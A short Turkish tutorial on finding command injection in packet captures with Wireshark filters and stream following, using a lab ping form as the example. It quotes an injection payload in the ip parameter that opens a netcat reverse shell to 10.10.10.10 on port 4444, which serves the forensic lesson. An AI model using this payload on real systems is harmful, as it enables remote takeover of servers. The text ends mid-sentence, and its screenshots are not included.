Command Injection Trafik Analizi

Bu yazımızda command injection zafiyetinin trafik analizini ele alacağız. İlk olarak girdi olarak bir IP adresi girelim.

Çıktıda TTL değeri 64 olarak gözlemlenmiş ve sistemde linux işletim sistemi olabileceği düşünülmüştür.

Yukarıdaki görselde 127.0.0.1 loopback adresine ping atıldıktan sonra id komutunun çalıştırılması sağlanmıştır.

Yukarıdaki görselde 127.0.0.1 loopback adresine ping atıldıktan sonra which nc komutunun çalıştırılması sağlanmıştır.

Yukarıdaki görselde 127.0.0.1 loopback adresine ping atıldıktan sonra 4444 nolu port üzerinden reverse shell alınmıştır.

Trafik analizi için ilk olarak http filtresini uygulayalım.

POST edilen isteklerde hangi komutların çalıştırıldığı ve sonuçları gözlemlenebilir. Bunun için ilgili isteği sağ tıklayıp Follow -> HTTP Stream belirtebiliriz. 59 nolu paket için bu işlemi gerçekleştirelim.

HTTP Stream aşağıdaki şekildedir:

Burada diğer paketler içinde bu işlem yapılarak çalıştırılan komutlar tespit edilmelidir.

Yukarıdaki görselde ip parametresine 127.0.0.1;/bin/nc 10.10.10.10 4444 –e /bin/bash değeri verilerek reverse shell alınması sağlanmıştır.

Reverse shell alındıktan sonra çalıştırılan komutların tespit edilmesi için aşağıdaki filtre uygulanabilir:

tcp.flags.push==1 and tcp.flags.ack==1

Reverse shell için 4444 nolu portun kullanıldığı yukarıdaki görselde gözlemlenmektedir. Çalıştırılan komutu ve çıktıyı gözlemlemek için 72 nolu paketi sağ tıklayıp Follow -> TCP Stream butonuna basalım.

Çalıştırılan komut aşağıdaki şekildedir: